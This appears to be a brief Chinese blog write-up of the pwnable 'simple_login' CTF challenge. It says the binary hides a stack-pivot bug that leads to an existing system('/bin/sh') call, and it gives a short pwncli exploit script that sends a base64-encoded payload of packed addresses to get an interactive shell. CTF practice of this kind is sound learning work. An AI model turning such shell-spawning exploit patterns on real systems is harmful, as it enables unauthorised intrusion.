pwnable_simple_login

2021-08-20 约 200 字预计阅读 1 分钟 - 次阅读

总结

本以为是要逆一下MD5，后来定睛一看，原来是个隐藏的栈迁移的题，还自带system("/bin/sh")。怪不得叫login，的确是签到题。也只记录下exp。

Exp

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


from pwncli import *

cli_script()

p:tube = gift['io']

payload = p32(0xdeadbeef) + p32(0x804925f) + p32(0x811eb40)

p.sendline(b64e(payload))

p.interactive()

引用与参考

1、My Blog

2、Ctf Wiki

3、pwncli

Buy me a coffee~

赞赏

支付宝

微信